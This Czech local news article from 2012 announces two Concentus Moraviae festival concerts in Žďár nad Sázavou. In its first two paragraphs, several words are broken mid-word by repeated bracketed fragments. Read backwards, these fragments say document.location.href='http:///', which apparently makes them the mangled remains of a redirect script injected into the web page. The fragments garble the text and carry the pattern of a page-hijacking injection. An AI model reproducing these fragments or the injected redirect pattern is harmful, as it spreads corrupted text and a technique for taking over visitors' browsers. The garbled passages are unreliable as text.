Žďár nad Sázavou, zdar nad sazavou, aktuality, Concentus, Moraviae
Rainbow page separator

Concentus Moraviae dorazí i do Žďáru

Pondělí, 11. června 2012

boreas-quartet-1-concentus-moraviae-2012-zdar-nad-sazavouŽďár nad Sázavou/ Již sedmnáctý ročník významného mezinárodního hudebního festivalu třinácti měst – Concentus Moraviae, dorazí brzy do Žďáru nad Sázavou. První vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupení se tam uskuteční v pondělí 11. června 2012, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to od půl osmé večer v barokních sálech zámeckého areálu. Zájemci se mohou těšit na dámskou sestavu s názvem Boreas Quartett Bremen. Tu tvoří Jin-Ju Baek, Elisabeth Champollion, Julia Fritz a Luise Manske. Komorní koncert má mnohoslibný podtitul – Pravá láska. Čtyři někdejší spolužačky z brémské Vysoké hudební školy ve svých dramaturgiích využijí rozsáhlý arzenál zobcových fléten mnoha typů a velikostí.

Další vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupení v rámci akce Concentus Moraviae se bude v okresním městě konat ve středu 20. června 2012. Koncert se odehraje v bazilice Nanebevzetí Panny Marie od půl osmé večer. Lidé, kteří na něj dorazí, uslyší výkony vokálního ansáblu Tiburtina Ensemble. Ten vznikl v roce 2008 z bývalých členek souboru Schola Benedicta.

Uměleckou vedoucí skupiny je Barbora Sojková. Členky sestavy ve Žďáře předvedou, že už dávno před nástupem hudební renesance vznikala v Evropě mimořádně působivá polyfonní díla. Zájemci, kteří si Concentus Moraviae nechtějí nechat ujít, mohou vstupenky zakoupit ve žďárském Domě kultury v Dolní ulici, v brněnském turistickém informačním centru nebo v síti Ticketportal. (zp)